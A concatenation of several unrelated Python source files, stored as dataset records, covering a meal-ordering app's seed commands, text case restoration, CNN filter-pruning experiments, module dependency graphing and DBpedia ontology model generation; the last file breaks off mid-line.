new_meal = Meal(title=meal.get('title'),\n description=meal.get('description'),\n category=meal.get('category'),\n day_linked=meal.get('day_linked'),\n source_price=meal.get('source_price'),\n price=meal.get('price'),\n enabled=meal.get('enabled'),\n timestamp_modified=datetime.datetime.utcnow())\n\n db_session.add(new_meal)\n print('Created meal:', new_meal)\n db_session.commit()\n\n\nclass PopulateUsers(Command):\n \"\"\"\n Creates fake users.\n \"\"\"\n option_list = (\n Option('--number', '-n', dest='num', default=20),\n )\n def __init__(self):\n pass\n\n def run(self, num):\n admin = User(real_name='Oleg',\n username='ollar',\n password='1',\n email='olegollar@gmail.com')\n db_session.add(admin)\n\n for i in range(num):\n with open('./words', 'r') as f:\n word = random.choice(f.read().splitlines())\n\n new_user = User(real_name=word,\n username=word,\n password=word,\n email=word+'@gmail.com')\n\n db_session.add(new_user)\n print('Created user:', new_user)\n db_session.commit()\n\n\n\nclass PopulateOrders(Command):\n \"\"\"\n Creates fake orders.\n \"\"\"\n option_list = (\n Option('--number', '-n', dest='num', default=200),\n )\n def __init__(self):\n self.users = db_session.query(User).all()\n self.meals = db_session.query(Meal).all()\n self.today = datetime.date.today()\n\n def _get_month_dates(self, num):\n for day in ((self.today + datetime.timedelta(14)) - datetime.timedelta(days=n) for n in range(num)):\n if day.weekday() in range(0,5):\n yield day\n\n\n def _get_day_meals(self, order_date):\n return [meal for meal in self.meals if meal.day_linked == order_date.weekday()]\n\n def run(self, num):\n for user in self.users:\n for date in self._get_month_dates(num):\n _meals = self._get_day_meals(date)\n\n for _m in _meals:\n new_order = Order(order_date=date,\n meal_id=_m.id,\n user_id=user.id,\n quantity=random.randint(1,10))\n\n db_session.add(new_order)\n print('Created orders for:', user)\n db_session.commit()\n print(\"Orders creation complete\")\n\n\nclass PopulateComments(Command):\n \"\"\"\n Creates fake comments.\n \"\"\"\n option_list = (\n Option('--number', '-n', dest='num', default=20),\n )\n def __init__(self):\n self.users = db_session.query(User).all()\n self.meals = db_session.query(Meal).all()\n self.today = datetime.date.today()\n\n def _compose_comment(self, num):\n text = []\n with open('./words', 'r') as f:\n word = f.read().splitlines()\n for i in range(num):\n text.append(random.choice(word))\n\n return ' '.join(text)\n\n def run(self, num):\n for user in self.users:\n for meal in self.meals:\n new_comment = Comment(meal_id=meal.id,\n user_id=user.id,\n content=self._compose_comment(num))\n\n db_session.add(new_comment)\n print('Created comments for:', user)\n db_session.commit()\n print(\"Comments creation complete\")\n\n\nmanager.add_command('hello', Hello)\nmanager.add_command('update_db', InitDB)\ntry:\n manager.add_command('popme', PopulateMeals)\n manager.add_command('popus', PopulateUsers)\n manager.add_command('popor', PopulateOrders)\n manager.add_command('popco', PopulateComments)\nexcept ProgrammingError:\n pass\n\nif __name__ == '__main__':\n manager.run()\n","sub_path":"canteen2/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47224653","text":"import os\nimport sys\nimport codecs\nimport difflib\n\nsys.path.insert(0, os.path.dirname(__file__))\n\nfrom logger import log\n\n\ndef restore_file_case(text_file, orig_file, debug=False):\n text_io = codecs.open(text_file, 'r', encoding='utf8')\n orig_io = codecs.open(orig_file, 'r', encoding='utf8')\n\n for line in text_io:\n orig_line = orig_io.next()\n result = restore_sentence_case(line.strip(), orig_line.strip(), debug)\n\n assert result.lower() == line.strip().lower(), \\\n \"Case restoration changed a sentence!\\n{}\\n{}\" \\\n .format(line.strip(), result)\n yield result.encode('utf8', 'replace')\n\n text_io.close()\n orig_io.close()\n\n\ndef restore_sentence_case(sent, orig_sent, debug=False):\n if debug and sent != orig_sent:\n log.debug(u'toks: {}'.format(sent).encode('utf8', 'replace'))\n log.debug(u'orig: {}'.format(orig_sent).encode('utf8', 'replace'))\n\n toks = sent.split()\n orig_toks = orig_sent.split()\n\n lc_toks = [tok.lower() for tok in toks]\n lc_orig_toks = [tok.lower() for tok in orig_toks]\n\n matcher = difflib.SequenceMatcher(None, lc_toks, lc_orig_toks)\n new_toks = []\n\n for tag, i1, i2, j1, j2 in matcher.get_opcodes():\n if debug and tag != 'equal' and sent != orig_sent:\n log.debug(u\" {}: ({},{}) '{}' -> ({},{}) '{}'\" \\\n .format(tag,\n i1, i2, ' '.join(toks[i1:i2]),\n j1, j2, ' '.join(orig_toks[j1:j2])) \\\n .encode('utf8', 'replace'))\n\n if tag == 'equal':\n new_toks += orig_toks[j1:j2]\n\n elif tag == 'replace':\n word = ' '.join(toks[i1:i2])\n orig_word = ' '.join(orig_toks[j1:j2])\n new_toks += [restore_word_case(word, orig_word)]\n\n elif tag == 'delete':\n if i1 == 0:\n tmp = toks[i1:i2]\n if is_capitalized(orig_toks[0]):\n orig_toks[0] = orig_toks[0].lower()\n tmp[0] = tmp[0].capitalize()\n elif is_uppercased(orig_toks[0]):\n tmp[0] = tmp[0].capitalize()\n new_toks += tmp\n else:\n new_toks += toks[i1:i2]\n\n elif tag == 'insert':\n if i1 == 0 and is_capitalized(orig_toks[j1]) and \\\n is_lowercased(orig_toks[j2]):\n orig_toks[j2] = orig_toks[j2].capitalize()\n\n new_sent = ' '.join(new_toks)\n\n if debug and sent != orig_sent:\n log.debug(\"sent: {}\".format(new_sent))\n\n return new_sent\n\n\ndef restore_word_case(tok, orig_tok):\n if tok.lower() == orig_tok.lower():\n return orig_tok\n\n if is_lowercased(orig_tok):\n return tok.lower()\n elif is_uppercased(orig_tok):\n return tok.upper()\n elif is_capitalized(orig_tok):\n return tok.capitalize()\n else:\n return tok\n\n\ndef is_lowercased(tok):\n return tok == tok.lower()\n\n\ndef is_uppercased(tok):\n return tok == tok.upper()\n\n\ndef is_capitalized(tok):\n return tok == tok.capitalize()\n","sub_path":"vwgec/utils/letter_case.py","file_name":"letter_case.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"390645946","text":"import torch\nimport train\nimport config as conf\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport math\nimport prune_and_train\nimport measure_flops\nimport evaluate\nimport numpy as np\nimport data_loader\nfrom sklearn import svm\nimport vgg\nimport predict_dead_filter\nfrom predict_dead_filter import fc\nimport prune\nimport generate_random_data\nimport resnet\n\ndef tmp(index_real,index):\n for i in range(len(index_real)):\n hit=0\n for ind in index_real[i]:\n if ind in index[i]:\n hit+=1\n print('in layer {}, number of true answer is {}. {} of total {} predictions are correct.'.format(i,len(index_real[i]),hit,len(index[i])))\n\ncheckpoint=torch.load('/home/victorfang/PycharmProjects/model_pytorch/baseline/vgg16_bn_cifar10,accuracy=0.941.tar')\nnet=checkpoint['net']\n\n\ndf_index,_,_=evaluate.find_useless_filters_data_version(net=net,filter_dead_ratio=0.9,batch_size=800,neural_dead_times=9000,use_random_data=False)\n\nconv_list,neural_list=evaluate.check_conv_alive_layerwise(net=net,neural_dead_times=800,batch_size=800)\ndf_index_random_data_conv,_,_=evaluate.find_useless_filters_data_version(net=net,filter_dead_ratio=0.9,batch_size=800,neural_dead_times=800,module_list=conv_list,neural_list=neural_list)\ntmp(df_index,df_index_random_data_conv)\n\nprint('--------------------------------------------')\n\nrelu_list,neural_list=evaluate.check_ReLU_alive(net=net,neural_dead_times=800,data=generate_random_data.random_normal(num=800,dataset_name='cifar10'))\ndf_index_random_data_relu,_,_=evaluate.find_useless_filters_data_version(net=net,filter_dead_ratio=0.9,batch_size=800,neural_dead_times=800,module_list=relu_list,neural_list=neural_list)\n\ntmp(df_index,df_index_random_data_relu)\n\n\n\nnum_conv = 0 # num of conv layers in the net\ndead_filter_index=list()\nfor mod in net.features:\n if isinstance(mod, torch.nn.modules.conv.Conv2d):\n num_conv += 1\nfor i in range(num_conv):\n df_index,_,_=evaluate.find_useless_filters_data_version(net=net,filter_dead_ratio=0.9,batch_size=800,neural_dead_times=800,use_random_data=True)\n dead_filter_index.append(df_index[i])\n net = prune.prune_conv_layer(model=net, layer_index=i + 1,\n filter_index=df_index[i]) # prune the dead filter\n\n\n\n\ndf_val, lf_val = predict_dead_filter.read_data(balance=True,\n path='/home/victorfang/Desktop/pytorch_model/vgg16bn_cifar10_dead_neural_normal_tar_acc_decent3/dead_neural',neural_dead_times=1200)\n\nstat_df_val = predict_dead_filter.statistics(df_val)\nstat_lf_val = predict_dead_filter.statistics(lf_val)\n\nval_x = np.vstack((stat_df_val, stat_lf_val))\nval_y = np.zeros(val_x.shape[0], dtype=np.int)\nval_y[:stat_df_val.shape[0]] = 1\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# validation data\nval_x_tensor = torch.tensor(val_x, dtype=torch.float32).to(device)\nval_y_tensor = torch.tensor(val_y, dtype=torch.long).to(device)\n\ncheckpoint=torch.load('/home/victorfang/Desktop/预测死亡神经元的神经网络/accuracy=0.72233.tar')\nnet=checkpoint['net']\nnet.load_state_dict(checkpoint['state_dict'])\noutput=net(val_x_tensor)\nprediction=torch.argmax(output,1)\ncorrect=(prediction==val_y_tensor).sum().float()\nacc=correct.cpu().detach().data.numpy()/val_y_tensor.shape[0]\nprint()\n\n# net = vgg.vgg16_bn(pretrained=False).to(torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"))\n# data_loader = data_loader.create_validation_loader(dataset_name='cifar10',default_image_size=32,\n# batch_size=72, mean=conf.cifar10['mean'], std=conf.cifar10['std'],\n# num_workers=conf.num_workers)\n# evaluate.evaluate_net(net=net, data_loader=data_loader, save_net=False)\n\n# net = vgg.vgg16_bn(pretrained=True)\n# net.classifier = nn.Sequential(\n# nn.Dropout(),\n# nn.Linear(512, 512),\n# nn.ReLU(True),\n# nn.Dropout(),\n# nn.Linear(512, 512),\n# nn.ReLU(True),\n# nn.Linear(512, 10),\n# )\n# for m in net.modules():\n# if isinstance(m, nn.Linear):\n# nn.init.normal_(m.weight, 0, 0.01)\n# nn.init.constant_(m.bias, 0)\n# net = net.to(torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"))\n#\n# # checkpoint = torch.load('/home/victorfang/Desktop/vgg16_bn_cifar10,accuracy=0.941.tar')\n# checkpoint = torch.load(\n# '/home/victorfang/Desktop/vgg16_bn_cifar10,accuracy=0.941.tar')\n#\n# net = checkpoint['net']\n# net.load_state_dict(checkpoint['state_dict'])\n# print(checkpoint['highest_accuracy'])\n# relu_list,neural_list=evaluate.check_ReLU_alive(net=net,\n# data_loader=data_loader.create_validation_loader(dataset_path=conf.cifar10['validation_set_path'],\n# default_image_size=32,\n# mean=conf.cifar10['mean'],\n# std=conf.cifar10['std'],\n# batch_size=1024,\n# num_workers=4,\n# dataset_name='cifar10',\n# ),\n# neural_dead_times=8000)\n\n\n\n\n\n\n\n\n\n\n# print(torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"))\n# checkpoint=torch.load('/home/victorfang/Desktop/vgg19_imagenet_deadReLU.tar')\n# relu_list=checkpoint['relu_list']\n# neural_list=checkpoint['neural_list']\n# net=checkpoint['net']\n#\n#\n# evaluate.plot_dead_filter_statistics(net,relu_list,neural_list,40000,1)\n# print()\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"644439382","text":"def explode(string):\n char_list = []\n for s in string:\n char_list += [s]\n \n return char_list\n\ndef get_string():\n string = input('Please enter a string: ')\n \n try:\n print(explode(string))\n except Exception as error:\n print('Error:', error)\n get_string()\n\nif __name__ == '__main__':\n get_string()\n","sub_path":"day04/explode.py","file_name":"explode.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"387017415","text":"import os\r\nimport random\r\n\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nfrom os import listdir\r\n\r\nimport sys\r\nimport re\r\n\r\ncurrent_file_name = sys.argv[0].split('/')[-1] #return current file name\r\n\r\n\"\"\"\r\n# ######## Historyjka 1. #########\r\ndef extract_filename(file): \r\n return file.split(\".\")[0] \r\n\r\n\r\ndef get_file_size(file_path): \r\n file_path = file_path if file_path.endswith('.py') else './'+file_path+'.py'\r\n return os.path.getsize(file_path)\r\n\r\ndef createGraph(path=\"./\"):\r\n g = nx.DiGraph() # create direct graph\r\n files_to_parse = list(filter(lambda f: f.endswith(\".py\"), listdir(path))) # only python files\r\n files_to_parse.pop(files_to_parse.index(current_file_name)) # without current file. \r\n \r\n for file_path in files_to_parse:\r\n g.add_node(extract_filename(file_path)+str(get_file_size(file_path)))\r\n find_edges_in_file(file_path, g)\r\n return g\r\n\r\ndef count_calls(path, module_name): #zliczanie odwołań dla krawędzi\r\n pattern = re.compile(r'{}\\.'.format(module_name)) \r\n with open(path, 'r') as f: \r\n calls = re.findall(pattern, f.read()) \r\n return len(calls) \r\n \r\n\r\ndef find_edges_in_file(file, g): \r\n with open(file, 'r') as fr:\r\n for line in fr: #iteruje po liniach\r\n if (\"import\" in line):\r\n tab = line.split()\r\n print(tab)\r\n g.add_edge(\r\n extract_filename(file)+str(get_file_size(file)),\r\n tab[1]+str(get_file_size(tab[1])),\r\n weight=count_calls(file,tab[1])\r\n )\r\n \r\ndef drawGraph(graph): #Dominik\r\n edge_labels = nx.get_edge_attributes(g, \"weight\")\r\n pos = nx.spring_layout(g)\r\n nx.draw(graph, pos=pos, with_labels=True, font_weight='bold')\r\n nx.draw_networkx_edge_labels(g, pos=pos, edge_labels = edge_labels)\r\n plt.show()\r\n\r\ng = createGraph()\r\ndrawGraph(g)\r\n\"\"\"\r\n\"\"\"\r\n# #### Historyjka nr2 ###########################\r\ndef rtrn_python_files(path): #zwraca listę plików .py \r\n return list(filter(lambda f: f.endswith(\".py\"), listdir(path)))\r\n\r\ndef drawGraph_func(graph): #Dominik\r\n edge_labels = nx.get_edge_attributes(g, \"weight\") \r\n #node_labels = nx.get_node_attributes(g, \"weight\") \r\n\r\n pos = nx.spring_layout(g) \r\n\r\n nx.draw(graph,pos=pos, with_labels=True, font_weight='bold')\r\n nx.draw_networkx_edge_labels(g, pos=pos, edge_labels = edge_labels) \r\n\r\n plt.show() \r\n\r\ndef createGraphFunctions(path=\"./HIS_II/\"):\r\n g = nx.DiGraph() # create direct graph\r\n files_to_parse = rtrn_python_files(path)\r\n #files_to_parse.pop(files_to_parse.index(current_file_name)) # without current file\r\n funkcje=[] #Tomek\r\n t_funkcje=[]\r\n #node'y\r\n for plik in files_to_parse:\r\n fs = get_function_names(path+\"/\"+plik)\r\n funkcje += fs\r\n t_funkcje = fs\r\n for name in t_funkcje:\r\n g.add_node(get_node_name(path+\"/\"+plik,name))\r\n\r\n #edge#\r\n for plik in files_to_parse: \r\n for name in funkcje:\r\n for othername in funkcje:\r\n if name == othername:\r\n continue\r\n methodCount = count_method(path+\"/\"+plik, name, othername) \r\n if (methodCount > 0):\r\n name = get_node_name(path+\"/\"+plik, name)\r\n othername = get_node_name(path+\"/\"+plik, othername)\r\n g.add_edge(name, othername, weight=methodCount)\r\n return g \r\n\r\ndef get_function_names(path): #function names from file. Tomek\r\n names = []\r\n with open(path, 'r') as fr:\r\n for line in fr:\r\n if re.match(r\"^\\s*?def\", line):\r\n n = line.split(\" \")[1].split(\"(\")[0] \r\n names.append(n)\r\n print(names)\r\n return names\r\n\r\ndef count_call_1(path, func_name): #Tomek\r\n pattern = re.compile(r'{}\\(\\)[^:]'.format(func_name))\r\n with open(path, 'r') as f:\r\n calls = re.findall(pattern, f.read())\r\n return len(calls)\r\n\r\ndef get_node_name(path, name): #Patryk\r\n return name+\" \"+str(count_call_1(path,name))\r\n\r\ndef count_method(path, names, othernames): #Dominik\r\n count = 0\r\n t = 0\r\n str = 'def ' + names\r\n f = open(path,\"r\")\r\n for x in f: #Tomek\r\n if t == 1:\r\n if 'def ' in x:\r\n t = 0\r\n f.close()\r\n return count\r\n if othernames in x:\r\n count=count+1\r\n elif str in x:\r\n t = 1\r\n f.close()\r\n return count \r\n\r\ng = createGraphFunctions() #Patryk\r\ndrawGraph_func(g)\r\n\"\"\"\r\n# #### Historyjka nr 3 ###########################\r\ndef rtrn_python_files(path): #zwraca listę plików .py\r\n return list(filter(lambda f: f.endswith(\".py\"), listdir(path))) \r\n\r\ndef drawGraph_func(graph):\r\n edge_labels = nx.get_edge_attributes(g, \"weight\") \r\n \r\n l = [] \r\n for u,v,d in g.edges(data=True): \r\n if \"weight\" not in d: \r\n l.append(((u,v), '')) \r\n else: \r\n l.append(((u,v), d['weight']))\r\n edge_labels = dict(l)\r\n \r\n pos = nx.spring_layout(g)\r\n\r\n nx.draw(graph,pos=pos, with_labels=True, font_weight='bold')\r\n nx.draw_networkx_edge_labels(g, pos=pos, edge_labels = edge_labels, label_pos=0.3)\r\n \r\n plt.show()\r\n \r\ndef count_call_1(path, func_name): #Tomek - zliczanie wywołań funckji\r\n pattern = re.compile(r'{}\\(\\)[^:]'.format(func_name))\r\n with open(path, 'r') as f:\r\n calls = re.findall(pattern, f.read())\r\n return len(calls)\r\n \r\ndef createGraphFunctions(path=\"./HIS_III/\"): #Wiktor, Kamil, Tomek\r\n\r\n g = nx.MultiDiGraph() # create multiDirected graph\r\n # files_to_parse = rtrn_python_files(path)\r\n #files_to_parse.pop(files_to_parse.index(current_file_name)) # without current file\r\n module_list = []\r\n for file_ in listdir(path):\r\n if os.path.isdir(path+\"/\"+file_): # sprawdzamy czy jest folderem\r\n if \"__init__.py\" in listdir(path+\"/\"+file_+\"/\"): # sprawdzamy czy jest modulem\r\n module_list.append(file_)\r\n \r\n print(module_list)\r\n for module in module_list:\r\n g.add_node(module) \r\n for file_ in listdir(path+\"/\"+module+\"/\"):\r\n for fun in get_function_names(path+\"/\"+module+\"/\"+file_):\r\n g.add_node(fun)\r\n g.add_edge(fun, module)\r\n \r\n for module_1 in module_list:\r\n for module_2 in module_list:\r\n if module_1 == module_2:\r\n continue\r\n count = 0\r\n for file_ in listdir(path+\"/\"+module_1+\"/\"):\r\n functions_in_module_1 = get_function_names(path+\"/\"+module_1+\"/\"+file_)\r\n for fun in functions_in_module_1:\r\n for plik in rtrn_python_files(path+module_2+\"/\"):\r\n count += count_call_1(path+\"/\"+module_2+\"/\"+plik, fun)\r\n g.add_edge(module_1, module_2, weight=count, label=module_1+module)\r\n return g\r\n \r\n\r\ndef get_function_names(path): #function names from file - Tomek\r\n names = []\r\n with open(path, 'r') as fr:\r\n for line in fr:\r\n if re.match(r\"^\\s*?def\", line):\r\n n = line.split(\" \")[1].split(\"(\")[0] \r\n names.append(n)\r\n print(names)\r\n return names \r\n\r\ng = createGraphFunctions() \r\ndrawGraph_func(g)\r\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"121224995","text":"\nimport argparse\nimport os\nimport sys\n\n##############################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=50)\nparser.add_argument('--batch_size', type=int, default=50)\nparser.add_argument('--gpu', type=int, default=0)\nparser.add_argument('--lr', type=float, default=1e-3)\nparser.add_argument('--eps', type=float, default=1e-6)\nargs = parser.parse_args()\n\nif args.gpu >= 0:\n os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=str(args.gpu)\n\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom collections import deque\n\n(x_train, y_train), (_, _) = tf.keras.datasets.cifar10.load_data()\n\nassert(np.shape(x_train) == (50000, 32, 32, 3))\nx_train = x_train - np.mean(x_train, axis=0, keepdims=True)\nx_train = x_train / np.std(x_train, axis=0, keepdims=True)\ny_train = keras.utils.to_categorical(y_train, 10)\n\n####################################\n\nx = tf.placeholder(tf.float32, [None, 32 , 32 , 3])\ny = tf.placeholder(tf.float32, [None, 10])\nlr = tf.placeholder(tf.float32, ())\n\n####################################\n\nw = np.load('cifar10_weights.npy', allow_pickle=True).item()\nref_w1_init = w['conv1_weights'][:, :, :, 0:8]\nref_w2_init = w['conv2_weights'][:, :, 0:8, 0:16]\n\nref_w1 = tf.Variable(ref_w1_init, dtype=tf.float32)\nref_w2 = tf.Variable(ref_w2_init, dtype=tf.float32)\n\n####################################\n\nctrl_w1_init = np.random.normal(loc=np.average(ref_w1_init), scale=np.std(ref_w1_init), size=np.shape(ref_w1_init))\nctrl_w2_init = np.random.normal(loc=np.average(ref_w2_init), scale=np.std(ref_w2_init), size=np.shape(ref_w2_init))\n\nctrl_w1 = tf.Variable(ctrl_w1_init, dtype=tf.float32)\nctrl_w2 = tf.Variable(ctrl_w2_init, dtype=tf.float32)\n\n####################################\n\nw1p_init = np.absolute(np.random.normal(loc=np.average(ref_w1_init), scale=np.std(ref_w1_init), size=[3, 3, 3, 8]))\nw1n_init = np.absolute(np.random.normal(loc=np.average(ref_w1_init), scale=np.std(ref_w1_init), size=[3, 3, 3, 8]))\nw2p_init = np.absolute(np.random.normal(loc=np.average(ref_w2_init), scale=np.std(ref_w2_init), size=[3, 3, 8, 16]))\nw2n_init = np.absolute(np.random.normal(loc=np.average(ref_w2_init), scale=np.std(ref_w2_init), size=[3, 3, 8, 16]))\n\nw1p = tf.Variable(w1p_init, dtype=tf.float32, constraint=lambda x: tf.clip_by_value(x, 0, np.infty))\nw1n = tf.Variable(w1n_init, dtype=tf.float32, constraint=lambda x: tf.clip_by_value(x, 0, np.infty))\nw2p = tf.Variable(w2p_init, dtype=tf.float32, constraint=lambda x: tf.clip_by_value(x, 0, np.infty))\nw2n = tf.Variable(w2n_init, dtype=tf.float32, constraint=lambda x: tf.clip_by_value(x, 0, np.infty))\n\n####################################\n\n'''\ndef conv_op(x, f, szx, szf):\n \n num_batch = szx[0]\n num_patch = szx[1] * szx[2]\n h = szx[1]\n w = szx[2]\n \n dim_filter = szf[0] * szf[1] * szf[2]\n num_filter = szf[3]\n kh = szf[0]\n kw = szf[1]\n \n patches = tf.image.extract_image_patches(images=x, ksizes=[1, kh, kw, 1], strides=[1,1,1,1], padding='SAME', rates=[1,1,1,1]) # [50, 32, 32, 27]\n patches = tf.reshape(patches, (num_batch * num_patch, dim_filter)) # [50*32*32, 27]\n \n f = tf.reshape(f, [dim_filter, num_filter]) # [3, 3, 3, 32] -> [27, 32]\n \n conv = tf.matmul(patches, f) # [50*32*32, 27] @ [27, 32] -> [50*32*32, 27]\n conv = tf.reshape(conv, [num_batch, h, w, num_filter])\n \n return conv\n'''\n\n# '''\ndef conv_op(x, w, dc1, dc2):\n # x = tf.Print(x, [tf.shape(w)[0] * tf.shape(w)[1] * tf.shape(w)[2]], message='', summarize=1000)\n conv = tf.nn.conv2d(x, w, [1,1,1,1], 'SAME')\n conv = tf.nn.relu(conv)\n return conv\n# '''\n\n'''\ndef conv_op(x, f, szx, szf):\n \n num_batch = szx[0]\n num_patch = szx[1] * szx[2]\n h = szx[1]\n w = szx[2]\n \n dim_filter = szf[0] * szf[1] * szf[2]\n num_filter = szf[3]\n kh = szf[0]\n kw = szf[1]\n \n patches = tf.image.extract_image_patches(images=x, ksizes=[1, kh, kw, 1], strides=[1,1,1,1], padding='SAME', rates=[1,1,1,1]) # [50, 32, 32, 27]\n patches = tf.reshape(patches, (num_batch * num_patch, dim_filter)) # [50*32*32, 27]\n \n f = tf.reshape(f, [dim_filter, num_filter]) # [3, 3, 3, 32] -> [27, 32]\n \n conv = tf.matmul(patches, f) # [50*32*32, 27] @ [27, 32] -> [50*32*32, 27]\n conv = tf.reshape(conv, [num_batch, h, w, num_filter])\n \n return conv\n'''\n\ndef conv_op_np(x, wp, wn):\n convp = tf.nn.conv2d(x, wp, [1,1,1,1], 'SAME')\n convn = tf.nn.conv2d(x, wn, [1,1,1,1], 'SAME')\n \n # this is useless ... we need negative outputs.\n # conv = tf.nn.relu(convp - tf.nn.relu(convn))\n \n # and this is retarded, we would have another set of weights and activation ... would not just subtract these\n # conv = tf.nn.relu(convp) - tf.nn.relu(convn)\n \n conv = convp\n \n return conv\n\n####################################\n\nref_conv1 = conv_op(x, ref_w1, [50,32,32,3], [3,3,3,8])\nref_pool1 = tf.nn.avg_pool(ref_conv1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nref_conv2 = conv_op(ref_pool1, ref_w2, [50,16,16,8], [3,3,8,16])\nref_pool2 = tf.nn.avg_pool(ref_conv2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\n####################################\n\nconv1 = conv_op_np(x, w1p, w1n)\npool1 = tf.nn.avg_pool(conv1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nconv2 = conv_op_np(pool1, w2p, w2n)\npool2 = tf.nn.avg_pool(conv2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nloss = tf.losses.mean_squared_error(labels=ref_pool2, predictions=pool2)\nparams = [w1p, w1n, w2p, w2n]\ngrads = tf.gradients(loss, params)\ngrads_and_vars = zip(grads, params)\ntrain = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(grads_and_vars)\n\n####################################\n\nctrl_conv1 = conv_op(x, ctrl_w1, [50,32,32,3], [3,3,3,8])\nctrl_pool1 = tf.nn.avg_pool(ctrl_conv1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nctrl_conv2 = conv_op(ctrl_pool1, ctrl_w2, [50,16,16,8], [3,3,8,16])\nctrl_pool2 = tf.nn.avg_pool(ctrl_conv2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nctrl_loss = tf.losses.mean_squared_error(labels=ref_pool2, predictions=ctrl_pool2)\nctrl_params = [ctrl_w1, ctrl_w2]\nctrl_grads = tf.gradients(ctrl_loss, ctrl_params)\nctrl_grads_and_vars = zip(ctrl_grads, ctrl_params)\nctrl_train = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(ctrl_grads_and_vars)\n\n####################################\n\nsess = tf.InteractiveSession()\ntf.global_variables_initializer().run()\n\n####################################\n\nrandom_losses = []\nctrl_random_losses = []\n\nfor jj in range(0, 50000, args.batch_size):\n s = jj\n e = jj + args.batch_size\n xs = x_train[s:e]\n ys = y_train[s:e]\n \n [l, cl] = sess.run([loss, ctrl_loss], feed_dict={x: xs, y: ys, lr: 0.0})\n \n random_losses.append(l)\n ctrl_random_losses.append(cl)\n\n####################################\n\nfor ii in range(args.epochs):\n \n losses = []\n ctrl_losses = []\n \n for jj in range(0, 50000, args.batch_size):\n s = jj\n e = jj + args.batch_size\n xs = x_train[s:e]\n ys = y_train[s:e]\n \n [l, cl, _, _] = sess.run([loss, ctrl_loss, train, ctrl_train], feed_dict={x: xs, y: ys, lr: args.lr})\n \n losses.append(l)\n ctrl_losses.append(cl)\n \n print ('loss %f/%f | ctrl loss %f/%f' % (np.average(losses), np.average(random_losses), np.average(ctrl_losses), np.average(ctrl_random_losses)))\n \n####################################\n \n","sub_path":"neg_equiv/v3/t8.py","file_name":"t8.py","file_ext":"py","file_size_in_byte":8148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"108955077","text":"from classes.HierarchicalModelGeneration import HierarchicalModelGeneration\nfrom classes.SparseVector import SparseVector\nfrom classes.STIClassifier import STIClassifier\nfrom classes.ClassifierAggregator import ClassifierAggregator\nfrom classes.HiearchicalEvaluator import HiearchicalEvaluator\nfrom distutils.dir_util import copy_tree\nfrom importlib import reload\nimport lucene\nimport settings as s\nimport logging\nimport logging.config\nimport os\n\nfrom json import dumps as jdumps\nfrom json import load as jload\n\nfrom pprint import pprint\nfrom collections import defaultdict, Counter, OrderedDict\nfrom pathlib import Path\nlogging.config.fileConfig(fname='logger.conf', disable_existing_loggers=False)\n\nlogger = logging.getLogger(__name__)\n\nlucene.initVM()\n\n\ndef main():\n for a in os.scandir(Path(\"results/confs\")):\n if a.name == 'desktop.ini':\n continue\n for b in os.scandir(a):\n if b.name == 'desktop.ini':\n continue\n print(a.name)\n print(b.name)\n print(Path(b.path) / 'conf.json')\n\n with open(s.configFile, 'w') as w, open(Path(b.path) / 'conf.json', 'r') as r:\n w.write(r.read())\n reload(s)\n s.modelsDir = Path(b.path) / 'models'\n s.resultFile1 = Path(b.path) / 'results_gs1.nt'\n s.resultFile2 = Path(b.path) / 'results_gs2.nt'\n s.resultFile3 = Path(b.path) / 'results_gs3.nt'\n\n hierarchicalModelGeneration = HierarchicalModelGeneration(s.indexShorAbstracts, s.indexCathegories, s.indexInstaceTypes,\n s.indexLinks, s.indexCathegoriesMerged, s.indexLHD, str(s.dbpeadiaBase))\n if s.createOntology:\n hierarchicalModelGeneration.traverseClassesHierarchyStart(True, 0, s.dbpediaFullClassHiearchy)\n hierarchicalModelGeneration.traverseClassesHierarchyStart(True, s.minInstances, s.dbpediaExcerpt)\n hierarchicalModelGeneration.adjustOntology(s.dbpediaExcerpt, s.minSubClasses)\n else:\n logger.info('Skipping onotlogy creation phase')\n\n ModelTemplates = hierarchicalModelGeneration.createModelTemplate(s.dbpediaExcerptCleaned)\n masterTermVectorsWithPos = {}\n if s.train:\n vectors = {base.name: [] for base in s.experimentBase}\n for i, modelTemplate in enumerate(ModelTemplates, 0):\n modelTemplate.pickRandomArticless(s.minInstances)\n modelTemplate.convertToBoa()\n for base in s.experimentBase:\n vector = modelTemplate.initClassTermVector(True, base)\n vectors[base.name].append(vector)\n logger.debug(f\"{base.name} - lenght {len(vector)}\")\n\n masterTermVectors = {base.name: sum(vectors[base.name], SparseVector()) for base in s.experimentBase}\n\n for base in 